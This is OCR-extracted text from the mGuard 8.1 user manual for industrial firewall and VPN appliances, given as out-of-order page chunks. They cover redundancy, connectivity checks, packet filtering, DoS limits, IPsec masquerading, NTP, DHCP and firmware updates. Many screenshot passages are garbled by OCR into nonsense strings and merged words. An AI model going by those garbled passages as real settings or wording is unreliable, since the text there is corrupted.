285. ironments e g when the mGuard is operated by means of a machine controller via the CMD contact mGuard rs4000 rs2000 3G and m Guard industrial rs only the option for a user to view the mGuard log file via the web based user interface of the mGuard may not be available at all When used remotely it is possible that a VPN connection error can only be diag nosed after the mGuard is temporarily disconnected from its power source which causes all the log entries to be deleted The relevant log entries of the mGuard that could be useful may be deleted because the mGuard regularly deletes older log entries on account of its limited memory space fanmGuard is being used as the central VPN partner e g ina remote maintenance center as the gateway for the VPN connections of numerous machines the messag es regarding activity on the various VPN connections are logged in the same data stream The resulting volume of the logging makes it time consuming to find the infor mation relevant to one error After archiving is enabled relevant log entries about the operations involved in establish ing VPN connections are archived in the non volatile memory of the mGuard if the con nections are established as follows Viathe CMD contact Viathe CGI interface nph vpn cgi using the synup command see Application Note How to use the CGI Interface Application notes are available in the download area at www
286. is redundancy pair echo requests Used only if the check failed F E 192 168 1 1 192 168 1 31 192 168 1 31 192 168 1 31 Redundancy gt gt Firewall Redundancy gt gt Connectivity Checks External interface 105661_en_02 Kind of check Specifies whether a connectivity check is performed on the external interface and if so how If at least one target must respond is selected it does not matter whether the ICMP echo request is answered by the pri mary or secondary target The request is only sent to the secondary target if the primary target did not offer a suitable answer In this way configura tions can be supported where the devices are only provided with ICMP echo requests if required lf all targets of one set must respond is selected then both targets must answer If no secondary target is specified then only the primary target must answer If Ethernet link detection only is selected then only the state of the Ethernet connection is checked Innominate Security Technologies 313 mGuard 8 1 Redundancy gt gt Firewall Redundancy gt gt Connectivity Checks Primary targets for This is an unsorted list of IP addresses used as targets for ICMP echo requests ICMP echo requests We recommend using the IP addresses of routers especially the IP addresses of default gateways or the actual IP address of the other mGuard Default 10 0 0 30 10 0 0 31 for new addresses Each set of targets for sta
287. is found to be faulty according to the checking procedure de scribed above When the mGuard makes subsequent attempts to retrieve a new configuration profile pe riodically after the time defined in the Pull Schedule field and Time Schedule has elapsed it will only accept the profile subject to the following selection criterion the con figuration profile provided must differ from the configuration profile previously identified as faulty for the mGuard and which resulted in the rollback The mGuard checks the MD5 total stored for the old faulty and rejected configuration against the MD5 total of the new configuration profile offered If this selection criterion is met i e a newer configuration profile is offered the mGuard retrieves this configuration profile applies it and checks it according to the procedure de scribed above It also disables the configuration profile by means of rollback if the check is unsuccessful If the selection criterion is not met i e the same configuration profile is being offered the selection criterion remains in force for all further cyclic requests for the period speci fied in the Number of times field If the specified number of times elapses without a change of the configuration profile on the configuration server the mGuard applies the unchanged new faulty configuration profile again despite it being faulty This is to rule out the possibility that external factors e g
288. it string d dATH OK COM Server Type RAW server w Localport 3001 Serial parameters 1 stopbit no parity v Please note On some platforms the serial port is not accessible For COM Server Baudrate and Handshake the Serial Console settings are used The RFC 2217 Server is initialized with the same serial settings as the RAW Server COM Server Allowed Networks Log ID fw comserver access N 3c7 adc93 1420 103f 9333 000cbe000566 x a Comment og Er 1 0 0 0 0 0 External Accept w Yes v Options for using the serial interface The serial interface can be used alternatively as follows As a primary external interface if the network mode is set to Modem under Network gt gt Interfaces on the General tab page see Network gt gt Interfaces on page 105 and on page 106 In this case data traffic is not processed via the WAN port Ethernet interface but via the serial interface As a secondary external interface if Secondary External Interface is activated and Modem is selected under Network gt gt Interfaces on the General tab page see Network gt gt Interfaces on page 105 and on page 106 In this case data traffic is processed permanently or temporarily via the serial interface Used for dialing in to the LAN or for configuration purposes see also Dial in on page 136 The following options are available Amodem is connected to the serial interface of the mGuard This modem is connec
289. ithin the permissible range 105661_en_02 Management gt gt Service I O gt gt Alarm output Connection state of the internal modem Connectivity state of redundancy 105661_en_02 Management menu Only if an internal modem is available and switched on mGuard rs4000 rs2000 3G mGuard industrial rs with inter nal analog modem or ISDN modem If set to Ignore the connection status of the internal modem does not influence the alarm output If set to Supervise the alarm output is opened if the internal modem does not have a connection Only if the Redundancy function is used see Section 16 If set to Ignore the connectivity check does not influence the alarm output If set to Supervise the alarm output is opened if the connec tivity check fails This is regardless of whether the mGuard is active or in standby mode Innominate Security Technologies 99 m Guard 8 1 4 8 Management gt gt Restart 4 8 1 Restart Management Restart Restart Restart Note please give the device approximately 40 seconds to reboot Restarts the mGuard Has the same effect as a temporary interruption in the power supply whereby the mGuard is switched off and on again A restart reboot is necessary in the event of an error It may also be necessary after a soft ware update 100 Innominate Security Technologies 105661_en_02 Blade Control menu 5 Blade Control menu This menu is only availab
290. ividuals An asterisk in the X 509 subject field can be used to specify that all subject entries in the certificate shown by the SSH client are permitted It is then no longer necessary to identify or define the subject in the certificate Limited access to certain subjects i e individuals or to subjects that have cer tain attributes In the certificate the certificate owner is specified in the Subject field The entry is com prised of several attributes These attributes are either expressed as an object identifier e g 1382 3 7 32 1 or more commonly as an abbreviation with a corresponding value Example CN John Smith O Smith and Co C US If certain subject attributes have very specific values for the acceptance of the SSH client by the mGuard then these must be specified accordingly The values of the other freely selectable attributes are entered using the asterisk wildcard Example CN O C US with or without spaces between attributes In this example the attribute C US must be entered in the certificate under Subject It is only then that the mGuard would accept the certificate owner Subject as a communi cation partner The other attributes in the certificates to be filtered can have any value If a subject filter is set the number but not the order of the specified attri butes must correspond to that of the certificates for which the filter is to be used Please note that the f
291. l Resolving of Hostnames Network gt gt DNS gt gt DNS server DNS If the mGuard is to initiate a connection to a partner on its own e g toa VPN gateway or NTP server and it is specified in the form of a host name i e www example com the mGuard must determine which IP address belongs to the host name To do this it con nects to a domain name server DNS to query the corresponding IP address there The IP address determined for the host name is stored in the cache so that it can be found di rectly i e more quickly for other host name resolutions With the Local Resolving of Hostnames function the mGuard can also be configured to respond to DNS requests for locally used host names itself by accessing an internal pre viously configured directory The locally connected clients can be configured manually or via DHCP so that the local address of the mGuard is used as the address of the DNS server to be used If the mGuard is operated in Stealth mode the management IP address of the mGuard if this is configured must be used for the clients or the IP address 1 1 1 1 must be entered as the local address of the mGuard DNS cache state Status of the host name resolution Used DNS servers DNS servers for which the associated IP address was queried Name servers to query DNS Root Name Servers Requests are sent to the root name servers on the Internet whose IP addresses are stored on the mGuard These ad dresses rarely change
292. l and External 2 interfaces These interfaces are only avail able on mGuard models that have a serial interface with exter nal access Protocol All means TCP UDP ICMP GRE and other IP protocols From IP To IP 0 0 0 0 0 means all IP addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Rout ing on page 24 206 Innominate Security Technologies 105661_en_02 Network Security menu Network Security gt gt Packet Filter gt gt Incoming Rules From Port To Port Action Comment Log Log entries for unknown connection attempts 1 105661_en_02 Only evaluated for TCP and UDP protocols any refers to any port gstartport endport e g 110 120 refers to a port area Individual ports can be specified using the port number or the corresponding service name e g 110 for pop3 or pops for 110 Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stealth mode Reject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Name of rule sets if defined When a name is specified for rule sets the firewall rules saved under this name take effect see Rule Records tab page Freely selectable comment for this rule For each indiv
293. lability Only available when Dedicated Interface is selected check at the external When Yes is selected no presence notifications CARP are interface transmitted or received via the external interface This can make sense in some scenarios for protection against external attacks 312 Innominate Security Technologies 105661_en_02 Redundancy menu 13 1 2 Connectivity Checks Targets can be configured for the internal and external interface in the connectivity check It is important that these targets are actually connected to the specified interface An ICMP echo reply cannot be received by an external interface when the corresponding target is connected to the internal interface and vice versa When the static routes are changed the targets may easily not be checked properly Redundancy Firewall Redundancy Redundancy f Connectivity Checks External interface Kind of check atleast one target must respond w Primary targets for ICMP echo nee P Recommended are the IPs of F a routers in particular of a default gateway orthereallP gl of the other mGuard of this echo requests Used only if the check failed C Internal interface 172 16 66 18 10 0 0 31 10 0 0 31 10 0 0 31 Kind of check atleast one target must respond w Primary targets for ICMP echo requests A I Recommended are the IPs of p a routers in particular of a default gateway or the realIP g E of the other mGuard of th
294. le SEC Stick Set this option to Yes to enable SEC Stick remote access remote access Remote SEC Stick Default 22002 TCP Port If this port number is changed the new port number only ap plies for access via the External External 2 or VPN interface Port number 22002 still applies for internal access 288 Innominate Security Technologies 105661_en_02 SEC Stick gt gt Global gt gt Access Delay between requests for a sign of life Maximum number of missing signs of life SEC Stick menu Default 120 seconds Values from 0 to 3600 seconds can be set Positive values in dicate that the mGuard is sending a query to the partner within the encrypted SSH connection to find out whether it can still be accessed The request is sent if no activity was detected from the partner for the specified number of seconds e g due to network traffic within the encrypted connection The value entered relates to the functionality of the encrypted SSH connection As long as the functions are working prop erly the SSH connection is not terminated by the mGuard as a result of this setting even when the user does not perform any actions during this time As the number of simultaneously open sessions is limited see Maximum number of cumulative concurrent sessions for all users it is important to terminate sessions that have expired Therefore the request for a sign of life is preset to 120 sec onds in the case of Version 7 4
295. le on the mGuard blade controller For reasons of compatibil ity always use the latest blade slide in module as controller 5 1 Blade Control gt gt Overview Blade Control Oveniew Overview RackiD 0 Power supply P1 P rover sy SS A R blade XL 7 4 1 default gt blade XL aaa 7 4 1 defautt 03 blade 27500087 7 4 1 defautt 04 blade 27500029 7 4 1 default 05 blade 27500065 7 4 1 defaut 06 Unknown Absent Blade Control gt gt Overview The ID of the rack where the mGuard is located This value can be configured for all blade devices on the controller Overview Rack ID Power supply P1 P2 Status of power supply units P1 and P2 OK Absent Defect Fatal error Blade Number of the slot where the mGuard blade is installed Device Device name e g blade or blade XL Status Online The device in the slot is operating correctly Present The device is present but not yet ready e g because it is just starting up Absent No device found in the slot 105661_en_02 WAN Status of the WAN port LAN Status of the LAN port Serial Serial number of the mGuard Version Software version of the mGuard B Backup automatic configuration backup on the controller is activated deactivated for this slot R Restore automatic configuration restoration after replacing the mGuard is activated deactivated for this slot Innominate Security Technologies 101 mGuard 8 1
296. license must be installed first The device must be restarted in order to use this installed license 266 Innominate Security Technologies 105661_en_02 IPsec VPN menu Masquerade a Can only be used for Tunnel VPN type Example A control center has one VPN tunnel each for a large number of branches One local net work with numerous computers is installed in each of the branches and these computers are connected to the control center via the relevant VPN tunnel In this case the address area could be too small to include all the computers at the various VPN tunnel ends Masquerading solves this problem The computers connected in the network of a branch appear under a single IP address by means of masquerading for the VPN gateway of the control center In addition this enables the local networks in the various branches to all use the same network address locally Only the branch can establish VPN connections to the control center Network address for mas Specify the IP address area for which masquerading is used querading The sender address in the data packets sent by a computer via the VPN connection is only replaced by the address specified in the Local field see above if this computer has an IP address from this address area The address specified in the Local field must have the subnet mask 32 to ensure that only one IP address is signified Masquerading can be used in the following network modes Router PP
297. llow forwarding of GVRP frames Network Security menu When set to Yes the mGuard performs a range of tests to check for incorrect checksums packet sizes etc and drops packets that fail these tests This option is set to Yes by default TCP packets without flags set in their TCP header are nor mally rejected by firewalls At least one type of Siemens con troller with older firmware sends TCP keepalive packets with out TCP flags set These are therefore discarded as invalid by the mGuard When set to Yes forwarding of TCP packets where no TCP flags are set in the header is enabled This only applies when TCP packets of this type are sent within an existing TCP con nection established in the regular way TCP packets without TCP flags do not result in a new entry in the connection table see Connection Tracking on page 218 If the connection is already established when the mGuard is restarted the corresponding packets are still re jected and connection problems can be observed as long as no packets with flags belonging to the connection are sent These settings affect all the TCP packets without flags The Yes option thus weakens the security functions provided by the mGuard This option can be used to control the behavior of the mGuard when ICMP messages are received from the external network via the primary secondary external interface Regardless of the setting specified here incoming ICMP packets are always ac
298. low w Remote Certificate Subject CN VPN Endpunkt Maschine 06 L L O BeispielLieferant C DE Subject Alternative Names Issuer CN VPN SubCA 01 0 BeispielLieferant C DE Validity From Mar 20 18 38 09 2007 GMT to Mar 20 18 33 09 2010 GMT Fingerprint MDS 11 73 7D 98 89 6F AB DB 23 A1 22 06 A2 68 79 EC SHA1 E9 14 0A 50 84 36 62 C5 B0 2F 1F A7 FB 1E 89 47 30 53 BC B3 Filename pem Durchsuchen_ 105661_en_02 Innominate Security Technologies 269 mGuard 8 1 IPsec VPN gt gt Connections gt gt Edit gt gt Authentication Requirement Local X 509 Certificate Specifies which machine certificate the mGuard uses as au thentication to the VPN partner Select one of the machine certificates from the selection list The selection list contains the machine certificates that have been loaded on the mGuard under the Authentication gt gt Cer tificates menu item If None is displayed a certificate must be installed first None must not be left in place as this results inno X 509 authentication How the mGuard authenticates the remote partner The following definition relates to how the mGuard verifies the authenticity of the VPN re mote partner The table below shows which certificates must be provided for the mGuard to authenti cate the VPN partner if the VPN partner shows one of the following certificate types when a connection is established A machine certificate signed by a CA A self signed machine certificate
299. ltering network traffic active_waiting The mGuard is actively forwarding and filtering network traffic t s Thu Oct 27 11 33 39 CEST 2011 Additionally the mGuard waits for a restarting component active The mGuard is actively forwarding and filtering network traffic active eae re a ee ee baiiio Z s t s u Thu Oct 27 11 33 32 CEST 2011 t s u Thu Oct 27 11 33 40 CEST 2011 t s u Thu Oct 27 11 33 33 CEST 2011 t s u Thu Oct 27 11 33 33 CEST 2011 t s u Thu Oct 27 11 33 32 CEST 2011 The mG ES m fi E or VPN state inf s hich it me mie t s u Thu Oct 27 11 33 32 CEST 2011 a Ste eee soe es ee t f wu Thu Oct 27 11 33 32 CEST 2011 active The mGuard is actively forwarding and filtering network traffic Please note The table is sorted chronologically starting with the youngest former state t s u Thu Oct 27 11 31 53 CEST 2011 Update 105661_en_02 Innominate Security Technologies 315 mGuard 8 1 Redundancy gt gt FW Redundancy Status gt gt Redundancy Status Current State Status of the Components Availability Check Connectivity Checks State Replication Virtual Interface Con troller 316 Innominate Security Technologies Possible states booting the mGuard is starting faulty the mGuard is not yet connected properly outdated state synchronization of the databases is not yet up to date on_standby the mGuard is ready for activation
300. ly opened exclusively by other programs as this can lead to access conflicts 235 Innominate Security Technologies mGuard 8 1 CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Checked Share Time Schedule Every Sunday Every Monday Every Tuesday Everyday Several times a day Continuous You can start the check every day several times per day or on a specific weekday The mGuard system time must be set for the time schedule to work properly Integrity checks are not performed if the system time is not synchronized This can be carried out manually or via NTP see Time and Date on page 35 A check is only started if the mGuard is operating at the set time If it is not operating at the time a check is not performed later when the mGuard is started up again The check can also be started manually C FS Integrity Moni toring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Man agement Possible Actions Starting at Time at which the check starts hour minute If Several times a day is selected every 1 h 2h 3h 4h 6h 8h 12h Maximum time a Maximum duration of the check sequence in minutes eneekimay tare You can thus ensure that the check is completed in good time e g before a shift starts Checksum Memory Checksum Algorithm SHA 1 MD5 SHA 256 Checksum algorithms such as MD5 SHA 1 or SHA 256 are us
301. m Console on page 139 Innominate Security Technologies 135 m Guard 8 1 6 1 3 Dial in Only mGuard rs4000 3G mGuard rs4000 mGuard centerport mGuard industrial rs mGuard blade mGuard delta mGuard delta EAGLE mGuard Network Interfaces General Dial out Dial in Modem Console D PPP dial in options Modem PPP Off X LocalIP 192 168 2 1 Remote IP 192 168 2 2 PPP Loginname admin PPP Password eeeseee Incoming Rules PPP Log ID fw serial incoming N 00000000 0000 0000 0000 000000000000 ed rotccot J rromip rromron Tro Toron f acon comment tog Log entries for unknown connection attempts onl Outgoing Rules PPP Log ID fw serial outgoing N 00000000 0000 0000 0000 000000000000 ESE protocot f rromi romeo Troe orot f acion comment too Log entries for unknown connection am No v Network gt gt Interfaces gt gt Dial in PPP dial in options This menu item is not included in the scope of functions for the mGuard rs2000 3G mGuard rs2000 a Only mGuard rs4000 3G mGuard rs4000 mGuard centerport mGuard industrial rs mGuard blade mGuard delta mGuard delta EAGLE mGuard Should only be configured if the mGuard is to permit PPP dial in via one of the following Amodem connected to the serial interface A built in modem as option for the mGuard industrial rs A built in mobile network modem for mGuard rs4000 3G mGuard rs4000 PPP dial
302. m number of Outgoing default setting 75 new incoming outgo ing TCP connections SYN per second Maximum values for the number of incoming and outgoing TCP connections allowed per second Incoming default setting 25 These values are set to a level that can never be reached dur ing normal practical operation However they can be easily reached in the event of attacks thus providing additional pro tection If there are special requirements in your operating environ ment these values can be increased 105661_en_02 Innominate Security Technologies 223 mGuard 8 1 Network Security gt gt DoS Protection gt gt Flood Protection ICMP Maximum number of incoming outgoing ping frames ICMP Echo Request per second Stealth Mode Maximum number of 224 incoming outgoing ARP requests or ARP replies per second each Innominate Security Technologies Outgoing default setting 5 Incoming default setting 3 Maximum values for the number of incoming and outgoing ping packets allowed per second These values are set to a level that can never be reached dur ing normal practical operation However they can be easily reached in the event of attacks thus providing additional pro tection If there are special requirements in your operating environ ment these values can be increased Value 0 means that no ping packets are allowed through or in Default setting 500 Maximum values fo
303. mGuard smart mGuard pci mGuard blade mQGuard delta These devices must be updated successively while the relevant redundant device is dis connected If firewall redundancy is activated the two mGuard devices of a redundant pair can be up dated at the same time mGuard devices that form a pair automatically decide which mGuard is to perform the update first while the other mGuard remains active If the active mGuard is unable to boot within 25 minutes of receiving the update command because the other mGuard has not yet taken over it aborts the update and continues to run using the existing firmware version Updating the firmware There are two options for performing a firmware update 1 You have the current package set file on your computer the file name ends with tar gz and you perform a local update 2 The mGuard downloads a firmware update of your choice from the update server via the Internet and installs it Management Update Overview Update Local Update rena taco aw The filename of the package set has the extension tar gz The format of the filename you have to enter is update a b c d e f tar gz Online Update pacage sta Automatic Update sal the latest patch release x y Z install the latest minor release sv rte cen Note It might be possible that there is no direct update from the currently installed version to the latest published minor release av
304. mGuard smart After initial time synchronization the mGuard regularly compares the system time with the time servers Fine adjustment of the time is usually only made in the second range NTP State Displays the current NTP status Shows whether the NTP server running on the mGuard has been synchronized with the configured NTP servers to a suffi cient degree of accuracy If the system clock of the mGuard has never been synchro nized prior to activation of NTP time synchronization then synchronization can take up to 15 minutes The NTP server still changes the mGuard system clock to the current time after a few seconds as soon as it has successfully contacted one of the configured NTP servers The system time of the mGuard is then regarded as synchronized Fine adjustment of the time is usually only made in the second range NTP Server Enter one or more time servers from which the mGuard should obtain the current time If several time servers are specified the mGuard will automatically connect to all of them to deter mine the current time 105661_en_02 Innominate Security Technologies 39 m Guard 8 1 4 1 3 Shell Access Management System Settings Host Time and Date lt Shell Access E Mail Shell Access Enable SSH remote access Yes w Mote After updating ite Keys an SSH connect fo the mgwerd will show 8 waning message about changed SSH keys Concurrent Session Limits Allowed Network
305. mented using the command line of the mGuard If an external modem is connected to the serial interface you may have to enter correspond ing settings below under External Modem regardless of the use of the serial port and the modem connected to it Network gt gt Interfaces gt gt Modem Console Serial Console 140 a The following settings for the Baudrate and Hardware handshake are only valid for a configuration connection where a terminal or PC with terminal program is connected to the serial interface as described above The settings are not valid when an external modem is connected Settings for this are made further down under External Modem Baudrate The transmission speed of the serial interface is specified via the selection list Hardware handshake Off On RTS CTS Innominate Security Technologies When set to On flow is controlled by means of RTS and CTS signals 105661_en_02 Network gt gt Interfaces gt gt Modem Console External Modem This menu item is not included in the scope of functions for the mGuard rs2000 3G mGuard rs2000 105661_en_02 Serial console via USB Only for mGuard smart Hardware handshake RTS CTS Baudrate Handle modem trans parently for dial in only Modem init string Network menu No Yes When No is selected the mGuard smart uses the USB con nection solely as a power supply When Yes is selected the mGuard smart provides an
306. milliseconds 420 milliseconds HEHEHHE EHHH HHHH Results 172 16 66 18 sRsRsRsRsRsRsRsRsRsRsRsRsRsRsRsR Legend ICMP echo request sent F ICMP echo response received missing ICMP echo response _ no ICMP echo request sent success connected N 65536 32456 Ethernet link detection only 300 milliseconds 420 milliseconds ee es Redundancy gt gt FW Redundancy Status gt gt Connectivity Status External Interface Ethernet link status Number of check intervals Kind of check 318 Innominate Security Technologies Summarized result success fail Result of the connectivity check for the external interface The fail result is also displayed until the specific result of the connectivity check is Known The last two intervals of the connectivity check are taken into consideration for the combined result success is only dis played if both were successful success longer due to waiting time is displayed if the time an error was present was shorter than set under Waiting time prior to switching inthe Redundancy gt gt Firewall Redun dancy gt gt Redundancy menu Shows whether the Ethernet connection has been estab lished Number of completed check intervals When the counter is full a message is displayed in front of the number Repeats the setting for the connectivity check see Kind of check on Page 313 105661 _en_02 Redundancy menu Redundancy gt gt FW Redundan
307. models see Network gt gt Interfaces on page 105 Innominate Security Technologies 107 mGuard 8 1 Stealth default setting mGuard rs4000 rs2000 mGuard industrial rs mGuard smart mGuard pci SD mGuard pcie SD mGuard pci mGuard delta EAGLE mGuard Stealth mode Plug n Protect is used to protect a single computer or a local network with the mGuard Important if the mGuard is in Stealth network mode it is inserted into the existing network see figure without changing the existing network configuration of the connected devices Before ji After E K Guard A LAN can also be on the left The mGuard analyzes the active network traffic and independently configures its network connection accordingly It then operates transparently i e without the computers having to be reconfigured As in the other modes firewall and VPN security functions are available Externally supplied DHCP data is allowed through to the connected computer If the mGuard is to provide services such as VPN DNS NTP etc a firewall installed on the computer must be configured to allow ICMP echo requests ping me He In Stealth mode the mGuard uses internal IP address 1 1 1 1 This can be accessed from the computer if the default gateway configured on the computer is accessible In Stealth network mode a secondary external in
308. n it means that no password is being used For example this may be because redundancy has not been activated or the firmware is booting up 105661_en_02 Innominate Security Technologies 307 mGuard 8 1 Redundancy gt gt Firewall Redundancy gt gt Redundancy If an mGuard fails while the password is being changed the following scenarios apply Password replacement has been started on all mGuard devices and then interrupted because of a network error for example This scenario is rectified automatically Password replacement has been started on all mGuard devices However an mGuard then fails and must be replaced Examine the remaining mGuard to determine whether the process of changing the password has been completed If you can see a green check mark you must set the new password directly on the mGuard that is being replaced If you cannot see a green check mark it means that the password has not yet been changed on the remaining mGuard In this case you must change the password again on the mGuard that is still in operation Wait until the green check mark ap pears Only then should you replace the mGuard that has failed Configure the re placement mGuard with the new password immediately on setting up redundancy Password replacement has been started but not performed on all mGuard devices because they have failed Password replacement must be started as soon as a faulty mGuard is back online If an mGuard has been
309. n the definition of the VPN connection Verbose Logging Verbose modem log Only available if an internal or external modem is available and ging switched on Internal modem mGuard rs4000 rs2000 3G mGuard industrial rs with internal analog modem or ISDN modem External modem mGuard rs4000 rs2000 mGuard rs4000 rs2000 3G mGuard centerport m Guard industrial rs mGuard blade mGuard delta mGuard delta EAGLE mGuard Verbose logging Verbose mobile net Only available with the mGuard rs4000 rs2000 3G work logging Verbose logging 322 Innominate Security Technologies 105661_en_02 Logging Browse local logs 011 10 26_15 48 45 63338 011 10 26_15 48 45 63338 2011 10 26 _15 48 50 _ 77216 2011 10 26 _ 15 48 S50_ 77241 2011 10 26 _15 48 50 77251 011 10 26 _ 15 48 50_77278 2011 10 26 _15 48 50 77298 2011 10 26 15 48 S50_77323 2011 10 26 _ 15 48 50_ 77562 011 10 26_15 48 50 79624 2011 10 26_15 48 50 79689 2011 10 26 _ 15 48 50_ 79736 0011 10 26 15 48 50 80633 2011 10 26 _15 48 50 80690 2011 10 26 15 48 50 80744 2011 10 26 _15 48 50 80880 011 10 27_04 17 00 17574 2011 10 27_04 17 00 27016 011 10 27_04 17 00 27019 011 10 27_04 17 00 27023 2011 10 27_11 31 45 66814 2011 10 27_11 31 45 67108 2011 10 27_11 31 45 67138 011 10 27_11 31 45 _ 67154 2011 10 27_11 31 45 67175 2011 10 27_11 31 45 _67319 2011 10 27_11 31 45 _ 67553 2011 10 27_11 31 45 _ 67593 2 eS 7 Sa
310. nagement menu Activate traps Yes No enterprise oid mGuardTrapVPN genericTrap enterpriseSpecific specific trap mGuardTrapVPNL2TPConnStatus 3 additional mGuardTResVPNName mGuardTResVPNindex mGuardTResVPNPeer mGuardTResVPNStatus mGuardTResVPNLocal mGuardTResVPNRemote This trap is sent when the status of an L2TP connection changes Enables traps for mobile phone connection Traps are sent when an text message is received a call is received or the mo bile phone connection drops Trap destinations Traps can be sent to multiple destinations Destination IP Destination Port Destination Name Destination Community 105661_en_02 IP address to which the trap should be sent Default 162 Destination port to which the trap should be sent Optional name for the destination Does not affect the gener ated traps Name of the SNMP community to which the trap is assigned Innominate Security Technologies 89 m Guard 8 1 4 5 3 LLDP Management SNMP eu Query trap 7 LLDP LLDP Mode Enabled YW Internal LAN interface External WAN interface MAC 00 40 45 06 61 69 192 168 0 12 MAC 00 OC BE 04 1B DB 192 168 42 22 Port 5 FL SVVITCH SMCS_Boot WAN port rs4000 master LLDP Link Layer Discovery Protocol IEEE 802 1AB D13 uses suitable request methods to automatically determine the Ethernet network infrastructure LLDP capable devices pe riodically send E
311. ncrypted and stored on an ECS When set to Yes the ECS is accessed during the boot pro cess Innominate Security Technologies T7 mGuard 8 1 Profiles on an external storage medium mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard delta mGuard pci SD mGuard pcie SD EAGLE mGuard mGuard centerport EAGLE mGuard the configuration profiles can also be stored on external configuration storage ECS mGuard centerport and EAGLE mGuard with USB interface the configuration profiles can also be stored on a USB stick This must have the following properties FAT file system on the first primary partition at least 64 Mbytes free memory capacity mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard delta mGuard pci SD mGuard pcie SD configuration profiles can also be stored on an SD card up to 2 GB capacity It must have the following properties FAT file system on the first primary partition at least 64 Mbytes free memory capacity Certified and released by Innominate Security Technologies AG current release list can be found at www innominate com Saving a profile to an external storage medium e EAGLE mGuard connect the ECS to the V 24 socket ACA11 or USB socket ACA21 Type ACA21 ECS devices are not suitable for manual modifications by a computer or similar e mQGuard centerport and EAGLE mGuard and with USB interface insert the USB stick into the USB socket e mGuard rs4000 rs2000 3G
312. nction takes effect and the number of characters defined above under Repetition Rate are gener ated per second Default 250 105661_en_02 Management menu 4 1 2 Time and Date Set the time and date correctly Otherwise certain time dependent activities cannot be started by the mGuard see Time controlled activities on page 37 l Host Time and Date ui Shell Access E Mail Time and Date Current system time UTC Monday August 4 2014 12 57 43 Current system time local Monday August 4 2014 14 57 43 System time state Synchronized by hardware clock Local system time 2014 08 04 14 57 00 pyyYYY MM DD HH MM S5 Timezone in POSIX 1 CET 1CEST M3 5 0 M10 5 0 3 fEg CET 1 for the EU or CET 1CEST M3 5 0 M10 5 0 3 with automatic daylight saving time switching NTP State NTP server is disabled gt x F E pool ntp org Management gt gt System Settings gt gt Time and Date Time and Date Current system time The current system time is displayed as Universal Time Coor UTC dinates UTCs If Enable NTP time synchronization is not yet activated see below and Time stamp in filesystem is deactivated the clock will start at January 1 2000 Current system time Display If the sometimes different current local time should local be displayed the corresponding entry must be made under Timezone in POSIX 1 notation see below 105661_en_02 Innominate Security Technologies 35 mGuard 8 1 Manageme
313. ndancy connectivity check failed check The internal modem is offline modem No network link on LAN2 No network link on LANS No network link on LAN1 No network link on LAN4 No network link on LAN5 No network link on DMZ link _dmz State of Power Supply 1 Power supply 1 working inal power psu1 _ _ _ Power supply 1 out of order nn fail State of Power Supply 2 Power supply 2 working inal power psu2 moe Power supply 2 out of order anne fail State of the Input CMD 1 Service input 1 activated ihal service cmd1 __ _ _ _ Service input 1 deactivated ns State of the Input CMD 3 Service input 2 activated ihal service cmd2 a Service input 2 deactivated State of the Input CMD 3 Service input 3 activated ihal service cmd3 Service input 3 deactivated Board temperature state Temperature OK ihal tempera ture board_alarm link_swpO link_swp1 link_swp2 link_swp3 link_swp4 ok ok on off on off on off k O ho cold F Temperature too hot Temperature too cold On standby Temporarily up mD O Temporary state of the secondary external inter network ext2up yes face Offline Dialing offline network mo dem state State of the modem dialing Online online Initialized waiting init Ol Oo oO gt N 54 Innominate Security Technologies Management menu Table 4 1 Event table Plaintext Machinereadable Status of the redundancy redu
314. ndancy functions are not available on the mGuard rs2000 and mGuard rs2000 3G There are several different ways of compensating for errors using the mGuard so that an ex isting connection is not interrupted Firewall redundancy two identical mGuard devices can be combined to form a re dundant pair meaning one takes over the functions of the other if an error occurs VPN redundancy an existing firewall redundancy forms the basis for VPN redundan cy In addition the VPN connections are designed so that at least one mGuard in a re dundant pair operates the VPN connections Ring network coupling in ring network coupling another method is used Parts of a network are designed as redundant In the event of errors the alternative path is select ed 16 1 Firewall redundancy Using firewall redundancy it is possible to combine two identical mGuard devices into a re dundant pair single virtual router One mGuard takes over the functions of the other if an error occurs Both mGuard devices run synchronously meaning an existing connection is not interrupted when the device is switched Primary mGuard rn Guard P TN i Internal A External a etwor D lt Network MniGuard Secondary mGuard Figure 16 1 Firewall redundancy example Basic requirements for firewall redundancy A license is required for the firewall redundancy function It can only be used if the corre sponding license has been purc
315. ndancy status subsystem The device does not yet have proper con nectivity or cannot determine it for sure The device does not yet have proper con faulty_waiting nectivity or cannot determine it for sure and waits for a restarting component The device has an empty or outdated firewall outdated or VPN state information which it wants to re synchronize The device has an empty or outdated firewall outdated_waiting or VPN state information which it wants to re synchronize and waits for a restarting compo nent The device is on standby The device is on standby and waits for a re on_standby_waiting starting component The device becomes active becomes active The device is actively forwarding and filtering active network traffic The device is actively forwarding and filtering active_waiting network traffic and waits for a restarting com ponent The device transitions to the hot standby state becomes_standby VPN Connection Prepara Stopped vpn con armed mo state Not all IPSec SAs established All IPSec SAs established Activation state of a The state of the firewall rule record has fwrules state Firewall rule record changed VPN Connection IPsec SA No IPsec SAs established vpn con ipsec no yes up 105661_en_02 Innominate Security Technologies 55 mGuard 8 1 4 2 Management gt gt Web Settings 4 2 1 General Management Web Settings General i Access General Language English x
316. nds for which the network configuration assigned to the computer is valid The client should renew its assigned configuration shortly before this time expires Otherwise it may be assigned to other computers With enabled dynamic IP address pool The start of the address area from which the DHCP server of the mGuard should assign IP addresses to locally connected computers With enabled dynamic IP address pool The end of the address area from which the DHCP server of the mGuard should assign IP addresses to locally connected computers Specifies the subnet mask of the computers Default 255 255 255 0 Specifies the broadcast address of the computers Specifies which IP address should be used by the computer as the default gateway Usually this is the internal IP address of the mGuard Address of the server used by the computer to resolve host names in IP addresses via the Domain Name Service DNS If the DNS service of the mGuard is to be used enter the inter nal IP address of the mGuard here Address of the server used by the computer to resolve host names in addresses via the Windows Internet Naming Service WINS 105661_en_02 Network menu Network gt gt DHCP gt gt Internal DHCP Static Mapping To find out the MAC address of your computer proceed as according to MAC follows address Windows 95 98 ME e Start winipcfg ina DOS box Windows NT 2000 XP e Start ipconfig all in a prompt The MAC a
